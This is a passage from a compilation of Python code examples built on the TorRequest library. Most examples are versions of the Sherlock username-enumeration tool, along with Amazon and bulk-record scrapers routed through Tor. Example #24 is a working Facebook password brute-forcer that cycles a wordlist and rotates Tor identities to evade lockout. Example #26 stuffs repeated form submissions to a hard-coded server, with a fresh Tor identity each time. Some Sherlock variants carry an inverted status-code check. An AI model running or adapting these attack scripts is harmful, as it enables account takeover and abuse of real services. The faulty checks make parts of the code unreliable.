
            # Detect common site errors
            if status_code == 403 and not ignore_403:
                return 'Access denied', 'Access denied, use proxy/vpn'
            elif status_code >= 500:
                return f'Error {status_code}', f'Site error {status_code}'

            return None, None

        if status_code and not error_text:
            error_text, site_error_text = detect_error_page(
                html_text, status_code, failure_errors, 'ignore_403'
                in net_info)

        if error_text is not None:
            result = QueryResult(username,
                                 social_network,
                                 url,
                                 QueryStatus.UNKNOWN,
                                 query_time=response_time,
                                 context=error_text)
        elif error_type == "message":
            absence_flags = net_info.get("errorMsg")
            is_absence_flags_list = isinstance(absence_flags, list)
            absence_flags_set = set(
                absence_flags) if is_absence_flags_list else set(
                    {absence_flags})
            # Checks if the error message is in the HTML
            is_absence_detected = any([(absence_flag in html_text)
                                       for absence_flag in absence_flags_set])
            if not is_absence_detected:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not status_code >= 300 or status_code < 200:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        else:
            #It should be impossible to ever get here...
            raise ValueError(f"Unknown Error Type '{error_type}' for "
                             f"site '{social_network}'")

        extracted_ids_data = ''

        if ids_search and result.status == QueryStatus.CLAIMED:
            try:
                extracted_ids_data = extract(html_text)
            except Exception as e:
                logger.warning(f'Error while parsing {social_network}: {e}',
                               exc_info=True)

            if extracted_ids_data:
                new_usernames = {}
                for k, v in extracted_ids_data.items():
                    if 'username' in k:
                        new_usernames[v] = 'username'
                    if k in supported_recursive_search_ids:
                        new_usernames[v] = k

                results_site['ids_usernames'] = new_usernames
                result.ids_data = extracted_ids_data

        #Notify caller about results of query.
        query_notify.update(result)

        # Save status of request
        results_site['status'] = result

        # Save results from request
        results_site['http_status'] = status_code
        results_site['response_text'] = html_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    #Notify caller that all queries are finished.
    query_notify.finish()

    return results_total
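
A sketch of consuming the dictionary this coroutine returns (key names per the
docstring above; QueryStatus/QueryResult as used by the surrounding module,
assuming QueryResult keeps its status argument in a .status attribute; this
must itself run inside a coroutine):

results = await sherlock(username, site_data, query_notify, logger)
claimed = [site for site, info in results.items()
           if info.get('status') and info['status'].status == QueryStatus.CLAIMED]
print('accounts found on:', ', '.join(sorted(claimed)))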
Example #21
def sherlock(username,
             site_data,
             verbose=False,
             tor=False,
             unique_tor=False,
             proxy=None,
             print_found_only=False,
             timeout=None,
             color=True):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    verbose                -- Boolean indicating whether to give verbose output.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.
    color                  -- Boolean indicating whether to color terminal output

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        exists:        String indicating results of test for account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """
    print_info("Checking username", username, color)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    #Create multi-threaded session for all requests.
    session = ElapsedFuturesSession(max_workers=max_workers,
                                    session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            if not print_found_only:
                print_invalid(social_network,
                              "Illegal Username Format For This Site!", color)

            results_site["exists"] = "illegal"
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            results_site['response_time_ms'] = ""
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            #If only the status_code is needed don't download the body
            if net_info["errorType"] == 'status_code':
                request_method = session.head
            else:
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url_probe,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)
            else:
                future = request_method(url=url_probe,
                                        headers=headers,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type, response_time = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network,
            verbose=verbose,
            retry_no=3,
            color=color)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except:
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if error not in r.text:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if not r.status_code >= 300 or r.status_code < 200:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                print_found(social_network, url, response_time, verbose, color)
                exists = "yes"
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose,
                                    color)
                exists = "no"

        elif error_type == "":
            if not print_found_only:
                print_invalid(social_network, "Error!", color)
            exists = "error"

        # Save exists flag
        results_site['exists'] = exists

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text
        results_site['response_time_ms'] = response_time

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site
    return results_total
Example #22
import requests
from bs4 import BeautifulSoup
from fake_useragent import UserAgent  # assumed source of UserAgent
from torrequest import TorRequest


def pageSpr(link):
	dic={}
	ua = UserAgent()
	headers = {'User-agent': ua.random}  # random UA (the source embedded 'ua.random' inside the string literal)
	tr = TorRequest(proxy_port=1234)  # first positional argument is proxy_port
	tr.reset_identity()
	# note: the request below goes through requests directly, not through tr's Tor session
	url = requests.get('https://www.amazon.in/dp/' + str(link) + '?tag=YOURASSOCIATEID', headers=headers).text
	soup = BeautifulSoup(url, 'lxml')
	try:
		if soup.find('h1', id='title').span['id'] == "productTitle":
			xid='productTitle'
		else:
			xid='ebooksProductTitle'
	except (AttributeError, TypeError):
		pass
	try:
		dic["TITLE"]=soup.find('span', id=xid).text
	except (AttributeError, TypeError, UnboundLocalError):
		dic["TITLE"]=" "
		pass
	try:
		dic["AUTHOR"]=soup.find('a', class_='contributorNameID').text
	except (AttributeError, TypeError):
		dic["AUTHOR"]=" "
		pass
	try:
		dic["NO OF REVIEWS"]=soup.find('span', id='acrCustomerReviewText').text
	except (AttributeError, TypeError):
		dic["NO OF REVIEWS"]=" "
		pass
	try:
		dic["RATING"]=soup.find('span', id='acrPopover')['title']
	except (AttributeError, TypeError):
		dic["RATING"]=" "
		pass
	try:
		price=soup.find('div', id='twister').find_all('div', class_='top-level')
	except (AttributeError, TypeError):
		pass
	try:
		for i in price:
			try:
				dic[i.find('span', class_='a-color-base').text]=i.find('span', class_='a-color-price').text
			except (AttributeError, TypeError):
				continue
	except (UnboundLocalError):
		pass
	try:
		prodet=soup.find('div', id='detail_bullets_id').ul.find_all('li')
	except (AttributeError, TypeError, ValueError):
		pass
	try:
		for pro in prodet:
			try:
				prod=str(pro.text).split(" ")
				if len(prod)==2:
					dic[prod[0]]=[prod[1]]
			except (AttributeError, TypeError, ValueError):
				continue
	except (UnboundLocalError):
		pass
	return dic
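
A usage sketch for pageSpr() (the ASIN below is a placeholder; the function
returns a flat dict of title, author, review count, rating, price variants and
product details):

details = pageSpr('B000000000')          # hypothetical ASIN
for field, value in details.items():
    print(field, '->', value)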
Example #23
import tqdm
from multiprocessing import Pool
import numpy as np
from torrequest import TorRequest

from helpers import get_last_number, get_row, tratatu_datuak

hasiera = get_last_number(["bautizo", "hileta", "ezkontza"])
denera = 1_954_537
zati_kop = 1_000

jasotzeko = denera - hasiera
zatiak = [1]
zatiak += [int(jasotzeko / zati_kop)] * zati_kop

if jasotzeko % zati_kop != 0:
    zatiak += [jasotzeko % zati_kop]
zatiak = np.cumsum(zatiak)

for index in tqdm.tqdm(range(len(zatiak) - 1)):
    # fresh Tor circuit per chunk (note: tr is not passed to the pool workers,
    # so get_row must route through Tor itself for this to matter)
    tr = TorRequest(password='******')

    with Pool(50) as p:
        ids = list(range(zatiak[index] + hasiera, zatiak[index + 1] + hasiera))
        records = p.map(get_row, ids)
        tratatu_datuak(records)
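
The chunk arithmetic above slices the remaining id range into zati_kop roughly
equal pieces, with np.cumsum turning piece sizes into running boundary offsets
(plus a tail chunk for any remainder). A worked miniature with 10 ids in 3
chunks:

import numpy as np

jasotzeko, zati_kop = 10, 3
zatiak = [1] + [int(jasotzeko / zati_kop)] * zati_kop   # [1, 3, 3, 3]
if jasotzeko % zati_kop != 0:
    zatiak += [jasotzeko % zati_kop]                    # remainder chunk -> [..., 1]
print(np.cumsum(zatiak))                                # [ 1  4  7 10 11]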
Example #24
    def login(self):


        try:
            idx = 0
            attempts = 0


            # Get The Session
            if (os.path.isfile(self.get_session_name())):

                option = input(Style.BRIGHT+ Fore.WHITE + "Do you want to open the session %s [Y/n]: " % self.get_session_name())
                if (option == "Yes" or option == "YES" or option == "yes" or option == "y" or option == "Y"):
                    idx = self.get_session()-1

            # Read the lines from the wordlist.
            lines = open(self.words, 'r').readlines()

            # The user agent list
            user_agent_list = [
                # Chrome
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
                'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                # Firefox
                'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
                'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'
            ]

            tr = TorRequest()

            # Read the file line by line
            while idx != len(lines):

                if (idx < 0):
                    logging.log("debug", "Renewing the session..")
                    idx = 0

                    # Strip the password
                    password = lines[idx].rstrip()

                else:

                    # Strip the password
                    password = lines[idx].rstrip()


                user_agent = random.choice(user_agent_list)
                headers = {'User-Agent': user_agent}
                logging.log('debug', 'using header %s' % headers)
                logging.print_trying(password)

                try:
                    # Post the payload and get a response back.
                    payload = {
                        'email': self.email,
                        'pass': password,
                    }
                    response = tr.post(self.url, headers=headers, data=payload)
                except:
                    logging.log('warning', 'Connection error')
                    sys.exit(1)


                # Parse the html using BeautifulSoup and grab the title.
                soup = BeautifulSoup(response.content, 'html.parser')
                title = soup.title.string

                # Locked out: When this happens the best thing to do is
                # Save the session and try again later.
                #if ('Facebook' not in title):
                #    self.save_session(idx)
                #   logging.log("info", "LOCKED OUT: Trying again later")
                #   sys.exit(1)

                # Check if the title is 'Facebook' for a successful login.
                if ('Facebook'==title):

                    logging.print_creds(self.email, password)

                    # Save the credentials
                    self.save_creds(self.email, password)
                    break

                else:

                    # Increase some counters
                    idx += 1
                    attempts += 1
                    tr.reset_identity()

            logging.log("debug", "finished...")

        except KeyboardInterrupt:
            self.save_session(idx)
            sys.exit(1)
Example #25
def sherlock(username,
             site_data,
             query_notify,
             tor=False,
             unique_tor=False,
             proxy=None,
             timeout=None):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    query_notify           -- Object with base type of QueryNotify().
                              This will be used to notify the caller about
                              query results.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    timeout                -- Time in seconds to wait before timing out request.
                              Default is no timeout.

    Return Value:
    Dictionary containing results from report. Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        status:        QueryResult() object indicating results of test for
                       account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """

    #Notify caller that we are starting the query.
    query_notify.start(username)

    # Create session based on request methodology
    if tor or unique_tor:
        #Requests using Tor obfuscation
        underlying_request = TorRequest()
        underlying_session = underlying_request.session
    else:
        #Normal requests
        underlying_session = requests.session()
        underlying_request = requests.Request()

    #Limit number of workers to 20.
    #This is probably vastly overkill.
    if len(site_data) >= 20:
        max_workers = 20
    else:
        max_workers = len(site_data)

    #Create multi-threaded session for all requests.
    session = SherlockFuturesSession(max_workers=max_workers,
                                     session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # A user agent is needed because some sites don't return the correct
        # information since they think that we are bots (Which we actually are...)
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
        }

        if "headers" in net_info:
            # Override/append any extra headers required by a given site.
            headers.update(net_info["headers"])

        # URL of user on site (if it exists)
        url = net_info["url"].format(username)

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            results_site['status'] = QueryResult(username, social_network, url,
                                                 QueryStatus.ILLEGAL)
            results_site["url_user"] = ""
            results_site['http_status'] = ""
            results_site['response_text'] = ""
            query_notify.update(results_site['status'])
        else:
            # URL of user on site (if it exists)
            results_site["url_user"] = url
            url_probe = net_info.get("urlProbe")
            if url_probe is None:
                # Probe URL is normal one seen by people out on the web.
                url_probe = url
            else:
                # There is a special URL for probing existence separate
                # from where the user profile normally can be found.
                url_probe = url_probe.format(username)

            if (net_info["errorType"] == 'status_code'
                    and net_info.get("request_head_only", True) == True):
                #In most cases when we are detecting by status code,
                #it is not necessary to get the entire body:  we can
                #detect fine with just the HEAD response.
                request_method = session.head
            else:
                #Either this detect method needs the content associated
                #with the GET response, or this specific website will
                #not respond properly unless we request the whole page.
                request_method = session.get

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts running the request in a new thread, doesn't block the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url_probe,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)
            else:
                future = request_method(url=url_probe,
                                        headers=headers,
                                        allow_redirects=allow_redirects,
                                        timeout=timeout)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identify for tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Open the file containing account links
    # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        status = results_site.get("status")
        if status is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_text, exception_text = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network)

        #Get response time for response of our request.
        try:
            response_time = r.elapsed
        except AttributeError:
            response_time = None

        # Attempt to get request information
        try:
            http_status = r.status_code
        except:
            http_status = "?"
        try:
            response_text = r.text.encode(r.encoding)
        except:
            response_text = ""

        if error_text is not None:
            result = QueryResult(username,
                                 social_network,
                                 url,
                                 QueryStatus.UNKNOWN,
                                 query_time=response_time,
                                 context=error_text)
        elif error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if error not in r.text:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if 200 <= r.status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.CLAIMED,
                                     query_time=response_time)
            else:
                result = QueryResult(username,
                                     social_network,
                                     url,
                                     QueryStatus.AVAILABLE,
                                     query_time=response_time)
        else:
            #It should be impossible to ever get here...
            raise ValueError(f"Unknown Error Type '{error_type}' for "
                             f"site '{social_network}'")

        #Notify caller about results of query.
        query_notify.update(result)

        # Save status of request
        results_site['status'] = result

        # Save results from request
        results_site['http_status'] = http_status
        results_site['response_text'] = response_text

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    #Notify caller that all queries are finished.
    query_notify.finish()

    return results_total
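
The three error_type branches above carry the whole detection strategy. A minimal sketch of the same classification, with hypothetical names (classify, response) that are not part of the original code:

def classify(error_type, response, error_msg=None):
    """Map a finished response to 'claimed'/'available' (sketch only)."""
    if error_type == "message":
        # The site serves a known error message on missing profiles.
        return "available" if error_msg in response.text else "claimed"
    if error_type in ("status_code", "response_url"):
        # With redirects disabled, a 2XX on the profile URL means it exists.
        return "claimed" if 200 <= response.status_code < 300 else "available"
    raise ValueError(f"Unknown Error Type '{error_type}'")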
Example #26
from torrequest import TorRequest

ID = int(input("who's the lucky one? : "))
i = int(input("how many times mister?: "))
cookies = {
    'HoldTheDoor': 'f113024b10de77d8031c15bdcf2f830d67773813',
}

headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 OPR/66.0.3515.27',
    'Referer': 'http://158.69.76.135/level4.php',
}

data = {
    'id': ID,
    'holdthedoor': 'Submit',
    'key': 'f113024b10de77d8031c15bdcf2f830d67773813'
}
x = 0
while x < i:
    tr = TorRequest(password='******')
    tr.reset_identity()  #Reset Tor
    response = tr.post('http://158.69.76.135/level4.php',
                       headers=headers,
                       cookies=cookies,
                       data=data,
                       verify=False)
    ip = tr.get('http://ipecho.net/plain')
    print("***********  Identity {} ^_^ ********* \n              {} ".format(
        x + 1, ip.text))
    x += 1
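
TorRequest.reset_identity() is, in effect, a NEWNYM signal sent over Tor's control port. A rough equivalent using stem directly, assuming a local Tor daemon with its control port on 9051 and cookie or no-password auth:

from stem import Signal
from stem.control import Controller

with Controller.from_port(port=9051) as controller:
    controller.authenticate()         # pass password=... if one is configured
    controller.signal(Signal.NEWNYM)  # ask Tor for a fresh circuit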
Example #27
def sherlock(username,
             site_data,
             verbose=False,
             tor=False,
             unique_tor=False,
             proxy=None,
             print_found_only=False):
    """Run Sherlock Analysis.

    Checks for existence of username on various social media sites.

    Keyword Arguments:
    username               -- String indicating username that report
                              should be created against.
    site_data              -- Dictionary containing all of the site data.
    verbose                -- Boolean indicating whether to give verbose output.
    tor                    -- Boolean indicating whether to use a tor circuit for the requests.
    unique_tor             -- Boolean indicating whether to use a new tor circuit for each request.
    proxy                  -- String indicating the proxy URL
    print_found_only       -- Boolean indicating whether to print only found accounts.

    Return Value:
    Dictionary containing results from report.  Key of dictionary is the name
    of the social network site, and the value is another dictionary with
    the following keys:
        url_main:      URL of main site.
        url_user:      URL of user on site (if account exists).
        exists:        String indicating results of test for account existence.
        http_status:   HTTP status code of query which checked for existence on
                       site.
        response_text: Text that came back from request.  May be None if
                       there was an HTTP error when checking for existence.
    """
    global amount

    print((Style.BRIGHT + Fore.GREEN + "[" + Fore.YELLOW + "*" + Fore.GREEN +
           "] Checking username" + Fore.WHITE + " {}" + Fore.GREEN +
           " on:").format(username))

    # A user agent is needed because some sites don't
    # return the correct information since they think that
    # we are bots
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'
    }

    # Allow 1 thread for each external service, so `len(site_data)` threads total
    executor = ThreadPoolExecutor(max_workers=len(site_data))

    # Create session based on request methodology
    underlying_session = requests.session()
    underlying_request = requests.Request()
    if tor or unique_tor:
        underlying_request = TorRequest()
        underlying_session = underlying_request.session

    # Create multi-threaded session for all requests. Use our custom FuturesSession that exposes response time
    session = ElapsedFuturesSession(executor=executor,
                                    session=underlying_session)

    # Results from analysis of all sites
    results_total = {}

    # First create futures for all requests. This allows for the requests to run in parallel
    for social_network, net_info in site_data.items():

        # Results from analysis of this specific site
        results_site = {}

        # Record URL of main site
        results_site['url_main'] = net_info.get("urlMain")

        # Don't make request if username is invalid for the site
        regex_check = net_info.get("regexCheck")
        if regex_check and re.search(regex_check, username) is None:
            # No need to do the check at the site: this user name is not allowed.
            print((Style.BRIGHT + Fore.WHITE + "[" + Fore.RED + "-" +
                   Fore.WHITE + "]" + Fore.GREEN + " {}:" + Fore.YELLOW +
                   " Illegal Username Format For This Site!"
                   ).format(social_network))
            results_site["exists"] = "illegal"
        else:
            # URL of user on site (if it exists)
            url = net_info["url"].format(username)
            results_site["url_user"] = url

            request_method = session.get
            if social_network != "GitHub":
                # If only the status_code is needed don't download the body
                if net_info["errorType"] == 'status_code':
                    request_method = session.head

            if net_info["errorType"] == "response_url":
                # Site forwards request to a different URL if username not
                # found.  Disallow the redirect so we can capture the
                # http status from the original URL request.
                allow_redirects = False
            else:
                # Allow whatever redirect that the site wants to do.
                # The final result of the request will be what is available.
                allow_redirects = True

            # This future starts the request in a new thread without blocking the main thread
            if proxy is not None:
                proxies = {"http": proxy, "https": proxy}
                future = request_method(url=url,
                                        headers=headers,
                                        proxies=proxies,
                                        allow_redirects=allow_redirects)
            else:
                future = request_method(url=url,
                                        headers=headers,
                                        allow_redirects=allow_redirects)

            # Store future in data for access later
            net_info["request_future"] = future

            # Reset identity for Tor (if needed)
            if unique_tor:
                underlying_request.reset_identity()

        # Add this site's results into final dictionary with all of the other results.
        results_total[social_network] = results_site

    # Core logic: if Tor requests, make them here; if multi-threaded, wait for the responses
    for social_network, net_info in site_data.items():

        # Retrieve results again
        results_site = results_total.get(social_network)

        # Retrieve other site information again
        url = results_site.get("url_user")
        exists = results_site.get("exists")
        if exists is not None:
            # We have already determined the user doesn't exist here
            continue

        # Get the expected error type
        error_type = net_info["errorType"]

        # Default data in case there are any failures in doing a request.
        http_status = "?"
        response_text = ""

        # Retrieve future and ensure it has finished
        future = net_info["request_future"]
        r, error_type, response_time = get_response(
            request_future=future,
            error_type=error_type,
            social_network=social_network,
            verbose=verbose,
            retry_no=3)

        # Attempt to get request information
        try:
            http_status = r.status_code
        except AttributeError:
            pass
        try:
            response_text = r.text.encode(r.encoding)
        except (AttributeError, TypeError, LookupError):
            pass

        if error_type == "message":
            error = net_info.get("errorMsg")
            # Checks if the error message is in the HTML
            if error not in r.text:
                print_found(social_network, url, response_time, verbose)
                exists = "yes"
                amount = amount + 1
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose)
                exists = "no"

        elif error_type == "status_code":
            # Checks if the status code of the response is 2XX
            if 200 <= r.status_code < 300:
                print_found(social_network, url, response_time, verbose)
                exists = "yes"
                amount = amount + 1
            else:
                if not print_found_only:
                    print_not_found(social_network, response_time, verbose)
                exists = "no"

        elif error_type == "response_url":
            # For this detection method, we have turned off the redirect.
            # So, there is no need to check the response URL: it will always
            # match the request.  Instead, we will ensure that the response
            # code indicates that the request was successful (i.e. no 404, or
            # forward to some odd redirect).
            if 200 <= r.status_code < 300:
                print_found(social_network, url, response_time, verbose)
                exists = "yes"
                amount = amount + 1
            else:
